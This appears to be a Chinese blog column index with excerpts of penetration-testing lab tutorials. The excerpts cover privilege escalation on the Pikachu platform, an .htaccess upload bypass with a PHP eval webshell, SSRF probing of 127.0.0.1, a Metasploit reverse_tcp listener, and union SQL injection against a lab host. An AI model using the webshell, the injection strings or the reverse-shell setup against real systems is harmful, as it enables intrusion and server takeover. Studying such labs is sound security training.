漏洞原理及复现
各种的漏洞原理及复现
Starry丶丶
这个作者很懒,什么都没留下…
展开
-
Pikachu漏洞平台之越权
水平越权A用户和B用户属于同一级别用户,但各自不能操作对方个人信息。A用户如果越权操作B用户个人信息的情况称为水行越权操作三个用户 lucy/lili/kobe 密码都为1234561.登录Lucy用户2.可以通过修改username值进行水平越权垂直越权1.登入超级用户admin,发现有修改的权限2.登入pikachu用户,发现只能看不能修改3.登入超级用户,进行抓包,查看cookie值4.登入普通用户查看cookie值5.登入普通用户进行抓包,复制cookie值,然后把包原创 2022-04-26 18:20:37 · 232 阅读 · 0 评论 -
黑名单绕过
在很多时候有限制文件上传的类型,而黑名单ban了很多相关的后缀,如果没有警用.htaccee那么就能触发getshell.htaccess可以把.jpg解析成phpAddType application/x-httpd-php .jpg先上传.htaccess文件,但是要修改后缀来绕过前端验证,在通过抓包修改回来再上传jpg的文件,其实是将php一句话木马的文件改为jpg后缀PHP: <?php @eval($_POST['404']);?>用蚁剑连接http原创 2022-04-20 11:31:51 · 903 阅读 · 0 评论 -
SSRF漏洞
x.x.x.x:8080 - 判断 SSRF 是否存在能够对外发起网络请求的地方,就可能存在 SSRF。首先看下目标站点的功能,获取站点快照:先尝试获取外网 URL 试试看,测试一下经典的 百度 robots.txt:https://www.baidu.com/robots.txt测试成功,网站请求了baidu的robots.txt文件,并将请求页面的内容回显到了网站前端中。接下来尝试获取内网URL看看,测试请求127.0.0.1看看有什么反应:127.0.0.1测试依然成功,网站请求原创 2022-03-28 11:55:20 · 5069 阅读 · 0 评论 -
上传木马后门
1.进入监听模块use exploit/multi/handler2.修改LPORT和LHOST、payload参数set payload windows/x64/meterpreter/reverse_tcp3.run -j4.监听5.用xshell连接虚拟机,输入命令:sz 后门名称,即可下载到本机中(要把电脑管家关闭,不然会被拦截删除)6.用蚁剑打开,拖进去...原创 2022-04-20 10:47:58 · 601 阅读 · 0 评论 -
Union注入攻击
1.判断注入点主要是判断两个条件1.我们传入的参数是否可控2.我们传入的参数能否在数据库执行?id=1'?id=1' and 1=1 --+?id=1' and 1=2 --+尝试单引号注入,发现报错信息http://192.168.183.150:8081/Less-1/?id=1%27将单引号闭合后,页面返回正常http://192.168.183.150:8081/Less-1/?id=1%27%20and%201=1%20--+2.查询字段判断字段个数?id=1原创 2022-04-21 11:38:19 · 2004 阅读 · 0 评论